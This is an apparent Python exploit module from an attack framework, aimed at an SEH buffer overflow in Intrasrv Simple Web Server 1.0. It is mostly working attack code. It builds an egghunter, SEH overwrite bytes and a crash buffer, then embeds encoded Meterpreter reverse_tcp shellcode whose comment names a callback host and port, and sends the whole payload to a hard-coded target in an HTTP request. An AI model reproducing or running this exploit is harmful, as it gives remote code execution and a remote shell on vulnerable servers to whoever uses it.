'''
Created on 17/08/2013

@author: hackma00100
'''
from core.red.hipnored import HipnoRed

class Intrasrv(object):
    '''
    classdocs
    '''


    def __init__(self):
        '''
        Constructor
        '''
        pass
    
    
    def viewinfo(self):
        init = {
                    "nombre": "Intrasrv 1.0 Buffer Overflow",
                    "descripcion": \
                    "This module exploits a boundary condition error in Intrasrv Simple Web Server 1.0.\n \
                     The web interface does not validate the boundaries of an HTTP request string prior\n \
                     to copying the data to an insufficiently large buffer.\n \
                     Successful exploitation leads to arbitrary remote code execution\n \
                     in the context of the application",
                    "author": "PsychoSpy <neinwechter[at]gmail.com>",
                    "version": "1.0",
                    "fechacreacion": "May 30 2013",
                    "objetivos": "v1.0 - XP / Win7",
                    "plataform": "windows"
        }
        print "Nombre: {0} \nDescripcion: {1} \nVersion: {2} \
                    \nFecha de Creacion: {3} \
                    \nAutor: {4} \
                    \nObjetivo: {5} \
                    \nPlataforma: {6}" \
                    .format(
                    init.get("nombre"),
                    init.get("descripcion"),
                    init.get("version"),
                    init.get("fechacreacion"),
                    init.get("author"),
                    init.get("objetivos"),
                    init.get("plataform")
                    )
                    
    def exploit(self):
        target="192.168.56.1"
        egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90"*94
        nseh="\xEB\x80\x90\x90"#jmp back do egghunter
        seh="\xdd\x97\x40\x00"  #0x004097dd, # pop eax # pop ebp # ret  - intrasrv.exe
        crash = "\x90"*1427 + egghunter + nseh + seh + "\x90"*2439 #4000 bytes
        #windows/meterpreter/reverse_tcp lhost=192.168.1.15 lport=31337 R | msfencode -t c -b '\x56' -e x86/alpha_mixed
        shellcode = ("T00WT00W" + \
        "\x89\xe0\xd9\xca\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
        "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
        "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
        "\x69\x6c\x59\x78\x6f\x79\x55\x50\x53\x30\x37\x70\x65\x30\x4c"
        "\x49\x79\x75\x66\x51\x5a\x72\x70\x64\x6c\x4b\x71\x42\x66\x50"
        "\x6e\x6b\x50\x52\x34\x4c\x4c\x4b\x36\x32\x74\x54\x4c\x4b\x52"
        "\x52\x47\x58\x36\x6f\x48\x37\x42\x6a\x55\x76\x65\x61\x69\x6f"
        "\x66\x51\x59\x50\x6c\x6c\x35\x6c\x71\x71\x43\x4c\x35\x52\x46"
        "\x4c\x65\x70\x5a\x61\x58\x4f\x54\x4d\x43\x31\x6b\x77\x6a\x42"
        "\x78\x70\x42\x72\x51\x47\x6e\x6b\x73\x62\x66\x70\x6c\x4b\x53"
        "\x72\x55\x6c\x57\x71\x4a\x70\x4e\x6b\x43\x70\x31\x68\x4d\x55"
        "\x79\x50\x71\x64\x51\x5a\x75\x51\x6a\x70\x52\x70\x6c\x4b\x32"
        "\x68\x34\x58\x4c\x4b\x30\x58\x37\x50\x65\x51\x39\x43\x69\x73"
        "\x35\x6c\x32\x69\x4c\x4b\x44\x74\x4e\x6b\x65\x51\x49\x46\x46"
        "\x51\x4b\x4f\x64\x71\x4b\x70\x6c\x6c\x49\x51\x4a\x6f\x44\x4d"
        "\x45\x51\x7a\x67\x76\x58\x59\x70\x73\x45\x39\x64\x77\x73\x71"
        "\x6d\x59\x68\x57\x4b\x43\x4d\x46\x44\x30\x75\x49\x72\x43\x68"
        "\x6e\x6b\x30\x58\x44\x64\x37\x71\x5a\x73\x71\x76\x6e\x6b\x36"
        "\x6c\x32\x6b\x6c\x4b\x42\x78\x35\x4c\x57\x71\x79\x43\x4e\x6b"
        "\x67\x74\x4c\x4b\x63\x31\x48\x50\x4c\x49\x43\x74\x31\x34\x37"
        "\x54\x43\x6b\x43\x6b\x51\x71\x71\x49\x63\x6a\x46\x31\x39\x6f"
        "\x4d\x30\x72\x78\x71\x4f\x71\x4a\x4c\x4b\x44\x52\x5a\x4b\x4e"
        "\x66\x73\x6d\x62\x48\x57\x43\x77\x42\x37\x70\x35\x50\x65\x38"
        "\x32\x57\x73\x43\x57\x42\x51\x4f\x50\x54\x70\x68\x52\x6c\x52"
        "\x57\x55\x76\x65\x57\x69\x6f\x49\x45\x68\x38\x4c\x50\x46\x61"
        "\x45\x50\x53\x30\x61\x39\x48\x44\x51\x44\x72\x70\x63\x58\x37"
        "\x59\x4f\x70\x50\x6b\x53\x30\x79\x6f\x4b\x65\x70\x50\x36\x30"
        "\x72\x70\x30\x50\x33\x70\x66\x30\x51\x50\x46\x30\x73\x58\x7a"
        "\x4a\x76\x6f\x79\x4f\x4b\x50\x59\x6f\x6e\x35\x4a\x37\x33\x5a"
        "\x74\x45\x53\x58\x73\x4f\x37\x70\x73\x30\x43\x31\x65\x38\x37"
        "\x72\x65\x50\x52\x5a\x42\x49\x6c\x49\x68\x66\x70\x6a\x76\x70"
        "\x53\x66\x36\x37\x50\x68\x4c\x59\x6e\x45\x71\x64\x65\x31\x69"
        "\x6f\x6b\x65\x4b\x35\x59\x50\x73\x44\x44\x4c\x6b\x4f\x32\x6e"
        "\x66\x68\x74\x35\x4a\x4c\x50\x68\x7a\x50\x48\x35\x4e\x42\x33"
        "\x66\x6b\x4f\x68\x55\x72\x4a\x45\x50\x43\x5a\x77\x74\x61\x46"
        "\x70\x57\x32\x48\x47\x72\x5a\x79\x6f\x38\x63\x6f\x6b\x4f\x39"
        "\x45\x4e\x6b\x55\x66\x33\x5a\x47\x30\x43\x58\x55\x50\x72\x30"
        "\x67\x70\x53\x30\x76\x36\x42\x4a\x65\x50\x35\x38\x46\x38\x4d"
        "\x74\x73\x63\x48\x65\x39\x6f\x59\x45\x6d\x43\x76\x33\x33\x5a"
        "\x65\x50\x53\x66\x51\x43\x53\x67\x61\x78\x66\x62\x49\x49\x49"
        "\x58\x73\x6f\x4b\x4f\x5a\x75\x36\x61\x6f\x33\x37\x59\x4f\x36"
        "\x4d\x55\x68\x76\x52\x55\x6a\x4c\x38\x43\x41\x41")
        
        buffer= "GET / HTTP/1.1\r\n"
        buffer+="Host: " + crash + "\r\n"
        buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
        buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n"
        buffer+="Content-Length: 1048580\r\n\r\n"
        buffer+=shellcode
        red = HipnoRed(target, 80, True,"STREAM", 4);
        red.send(buffer)